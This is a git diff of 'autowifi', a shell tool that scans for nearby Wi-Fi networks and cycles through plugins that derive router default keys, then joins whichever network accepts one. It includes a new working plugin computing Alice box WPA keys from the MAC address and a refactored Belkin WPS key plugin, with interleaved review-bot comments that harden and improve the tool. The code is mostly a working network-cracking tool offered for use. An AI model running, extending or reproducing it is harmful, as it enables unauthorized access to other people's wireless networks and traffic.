-rwxr-xr-xusr/bin/autowifi19
-rwxr-xr-xusr/bin/autowifi_dryrun40
-rw-r--r--usr/lib/autowifi/lib/plugin_core26
-rwxr-xr-xusr/lib/autowifi/plugins/02alice20
-rwxr-xr-xusr/lib/autowifi/plugins/11belkin_wps9
5 files changed, 78 insertions, 36 deletions
diff --git a/usr/bin/autowifi b/usr/bin/autowifi
index 1969e650..5de46f41 100755
--- a/usr/bin/autowifi
+++ b/usr/bin/autowifi
@@ -114,6 +114,21 @@ loop_over_cracks(){
done
return 1
}
+loop_cracks_over_networks(){
+ wifi_init
+ for crack in $(find $crackdir -type f | sort -u); do
+ for i in `seq 1 $WIFI_COUNT`; do
+ KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})"
+ if [ $? -eq 0 ]; then
+ eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\"
+ if [ $? -eq 0 ]; then
+ return 0
+ fi
+ fi
+ done
+ done
+
+}
#scan_all(){
# for i in `seq 1 $WIFI_COUNT`; do
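Review bot: loop_cracks_over_networks has no explicit status after its loops, so when every plugin or connect attempt fails it returns the status of the last `if`, which is 0. `loop_over_cracks` directly above ends with `return 1`, and this function should do the same before its closing brace. Inside both `eval` lines `\${FREQ_${i}}` and `\${ENCRYPTION_${i}}` are left unquoted, so these scan-derived values are word-split and glob-expanded on the second parse; quote them like ESSID and MAC, e.g. `\"\${ENCRYPTION_${i}}\"`. `for crack in $(find $crackdir -type f | sort -u)` also splits on whitespace in plugin paths, so `$crackdir` should at least be quoted.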
@@ -151,11 +166,11 @@ elif [ -n "$1" ]; then
connect_to_network_by_ssid "$1"
else
echo looping network now
- check_internet || loop_over_networks
+ check_internet || loop_cracks_over_networks
while sleep 60; do
if ! check_internet; then
- loop_over_networks
+ loop_cracks_over_networks
fi
done
fi
diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun
index 1df94119..8860b4a6 100755
--- a/usr/bin/autowifi_dryrun
+++ b/usr/bin/autowifi_dryrun
@@ -2,30 +2,23 @@
# ENV:
# the root directory (e.g. root=$PWD/../../ if run from here )
cd $(dirname $(readlink -f $0))
-root=${root:-/}
-wifi=${wifi:-wlan0}
-
test "${1:-}" = 'quiet' && exec 2>&-
-# for iwlist_scan
-. $root/usr/lib/autowifi/lib/iwlist
+interface=${interface:-wlan0}
+root=${root:-../../}
+crackdir=$root/usr/lib/autowifi/plugins
+wifi_keys=$root/etc/autowifi/wifi_keys
+wifi_log=$root/var/log/autowifi.log
-# . $ROOT/usr/lib/autowifi/lib/
+# exists() run_hooks()
+. $root/usr/lib/autowifi/lib/core
-# for check_internet and check_gateway
-# . /usr/lib/autowifi/lib/network
+# start_wpa_supplicant()
+. $root/usr/lib/autowifi/lib/wpa_supplicant
crack_wifi(){
- #SSID MAC CHANNEL ENCRYPTION WPA WPA2
- if [ "$4" == off ];then
- encr=open
- elif [ "$6" -eq 1 ]; then
- encr=psk2
- elif [ "$5" -eq 1 ]; then
- encr=psk
- elif [ "$4" == on ]; then
- encr=wep
- fi
+ #SSID MAC CHANNEL ENCRYPTION
+
ALL_RET=1
for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do
printf "%s" "Trying $(basename $hack) against $1 : " >&2
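Review bot: The added `. $root/usr/lib/autowifi/lib/core` and `. $root/usr/lib/autowifi/lib/wpa_supplicant` lines now resolve through the relative default `root=${root:-../../}`, which is only correct if the unchecked `cd $(dirname $(readlink -f $0))` above succeeded. If that `cd` fails, the script sources whatever sits at that relative path under the caller's working directory. Make the `cd` fatal and quote the expansions: `cd "$(dirname "$(readlink -f "$0")")" || exit 1` and `. "$root/usr/lib/autowifi/lib/core"`. The same unchecked `cd` followed by a relative `. ../lib/plugin_core` appears in the new plugin 02alice. crack_wifi, whose body continues outside this hunk, could use the newly defined `$crackdir` in its `find` instead of repeating the path.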
@@ -41,13 +34,18 @@ crack_wifi(){
done
return $ALL_RET
}
+wifi_init(){
+ wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant
+ wifi_scan > /tmp/${interface}.scan
+ . /tmp/${interface}.scan
+}
loop_over_networks(){
- . /tmp/${wifi}.scan
+ wifi_init
+
echo "SSID:MAC:CHANNEL:ENCRYPTION:key"
for i in `seq 1 $WIFI_COUNT`; do
- eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}}
+ eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}}
done
}
-iwlist_scan > /tmp/${wifi}.scan
loop_over_networks
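Review bot: wifi_init writes the scan result to the predictable path `/tmp/${interface}.scan` and then sources it, so a local user who pre-creates that file or plants a symlink there controls what this script executes, presumably with the privileges needed to drive wpa_supplicant. Use a private file instead: `scan=$(mktemp) || return 1`, then `wifi_scan > "$scan" && . "$scan"`, then `rm -f "$scan"`. Sourcing the output also assumes that wifi_scan (not visible here) shell-escapes ESSIDs, which are set by whoever operates a nearby access point; that is worth confirming. The fixed `/tmp/autowifi.wpa_supplicant` argument raises the same predictable-name concern.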
diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core
index da003350..1b83b0c3 100644
--- a/usr/lib/autowifi/lib/plugin_core
+++ b/usr/lib/autowifi/lib/plugin_core
@@ -1,24 +1,38 @@
+#!/bin/sh
parse_plugin_args(){
[ $# -ne 4 ] && plugin_usage && exit 1
# convenience function to put args in ENV variables
ESSID="$1"
- MAC="$2"
+
+ # mac is returned without colon
+ MAC=$(printf "%s" "$2" | sed 's/://g')
+ # split up the mac address to vendor and private part
+ VENDOR_MAC=${MAC:0:6}
+ PRIVATE_MAC=${MAC:6:12}
CHANNEL="$3"
ENC="$4"
- if [ ${#MAC} -ne 17 ] ;then
+ if [ ${#MAC} -ne 12 ] ;then
echo "MAC malformed"
exit 1
fi
}
plugin_usage(){
cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC WPA WPA2"
+usage: $0 ESSID MAC CHANNEL ENC"
ESSID - string
MAC - 00:11:22:33:44:55
- ENC - on | off
- WPA - 0 | 1
- WPA2 - 0 | 1
+ CHANNEL - 4
+ ENC - wpa
EOF
}
+
+check_vendor_mac(){
+ needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+ shift
+ for i in "$@";do
+ [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+ done
+ return 1
+}
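Review bot: The added `#!/bin/sh` does not match the code below it, because `${MAC:0:6}`, `${MAC:6:12}` and the `==` inside `[ ]` in check_vendor_mac are bash extensions that fail under a strict POSIX sh such as dash. This file is sourced, so the effective interpreter is the plugin's, and the new 02alice also declares `#!/bin/sh` while using `${TMP:0:12}`. Either declare `#!/bin/bash` in the plugins or use portable forms such as `VENDOR_MAC=$(printf '%s' "$MAC" | cut -c1-6)` and `=`. In check_vendor_mac, `printf $1` and `printf $i` use the argument as the format string; `printf '%s' "$1"` avoids that. The `${#MAC} -ne 12` check runs only after the substrings are taken and still accepts non-hex characters.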
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice
new file mode 100755
index 00000000..1b4533a4
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02alice
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
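Review bot: `$((0x${MAC}-1))` places MAC inside an arithmetic expansion, but parse_plugin_args only verifies that it is 12 characters long, not that it is hexadecimal, and shell arithmetic on unvalidated text can evaluate more than a number. Reject anything else before this line, e.g. `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed" >&2; exit 1 ;; esac`. `printf $ETHMAC` and `printf ${TMP:0:12}` pass data as the format string and should be `printf '%s' "$ETHMAC"` and `printf '%s' "${TMP:0:12}"`. The "not affected" message is written to stdout, the stream that usr/bin/autowifi captures into KEY, so diagnostics would be better sent to stderr with `>&2`.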
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 82140523..65e08624 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0))
. ../lib/wps
parse_plugin_args "$@"
-MAC=$(printf "%s" $MAC| sed 's/://g')
-VENDOR_MAC=${MAC:0:6}
-PRIVATE_MAC=${MAC:6:12}
-if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
- echo "VENDOR MAC $VENDOR_MAC not affected"
- exit 1
-fi
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
calc_belkin(){
PRIVATE_MAC=${1}